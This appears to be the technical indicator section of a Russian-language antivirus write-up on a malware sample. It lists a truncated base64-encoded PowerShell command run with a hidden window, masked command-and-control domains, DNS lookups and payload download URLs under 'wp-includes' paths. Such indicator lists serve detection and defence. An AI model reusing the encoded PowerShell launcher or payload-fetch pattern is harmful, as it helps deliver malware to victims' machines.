Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAEEAQQBCAEcAQQBBAEEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEEAQQA0ACcALAAnAFEAQQBCACcAKQA7ACQAUwBBAFgAQQBBAFEAQQBYACAAPQAgACcAOQA5ADIAJwA7ACQAZABBAFEAawBBAEEAQgA9ACgAIgB7ADAAfQB7ADEAf...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1192580.cvr
- 'or###beauty.com':443
- 'ms###et.com.au':80
- 'br####onroney.com':80
- 'br####onroney.com':443
- http://ms###et.com.au/wp-includes/S_bZ/
- http://br####onroney.com/wp-includes/Nb_eL/
- 'or###beauty.com':443
- 'br####onroney.com':443
- DNS ASK or###beauty.com
- DNS ASK ms###et.com.au
- DNS ASK 29##316.com
- DNS ASK br####onroney.com
- DNS ASK de####aglik.com.tr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAEEAQQBCAEcAQQBBAEEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEEAQQA0ACcALAAnAFEAQQBCACcAKQA7ACQAUwBBAFgAQQBBAFEAQQBYACAAPQAgACcAOQA5ADIAJwA7ACQAZABBAFEAawBBAEEAQgA9ACgAIgB7ADAAfQB7ADEAf...' (со скрытым окном)